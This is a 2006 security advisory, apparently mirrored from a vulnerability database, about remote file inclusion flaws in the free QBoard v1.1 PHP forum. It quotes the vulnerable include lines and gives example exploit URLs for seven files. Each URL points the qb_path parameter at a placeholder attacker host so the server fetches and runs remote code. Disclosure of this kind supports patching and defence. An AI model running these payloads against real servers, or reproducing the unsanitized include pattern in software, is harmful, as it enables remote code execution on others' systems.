Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13403
HistoryJul 04, 2006 - 12:00 a.m.

free QBoard v1.1 Multiple Remote File include

2006-07-0400:00:00
vulners.com
21

free QBoard v1.1 Multiple Remote File include

Discovered By CrAsh_oVeR_rIdE
Arabian Security Team

site of script:http://sourceforge.net/projects/freeqboard/

Vulnerable: free QBoard v1.1

vulnerable code:

1- in index.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";

2- in about.php
include $qb_path."incs/header.php";

3- in contact.php
include $qb_path."incs/header.php";

4- in delete.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";

5- in faq.php
include $qb_path."incs/header.php";

6- in features.php
include $qb_path."incs/header.php";

7- in history.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";

$qb_path parameter File inclusion

vulnerable files :

index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php

example:
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?

Discovered By CrAsh_oVeR_rIdE
E-mail:[email protected]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG
HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL
LEZR.COM Member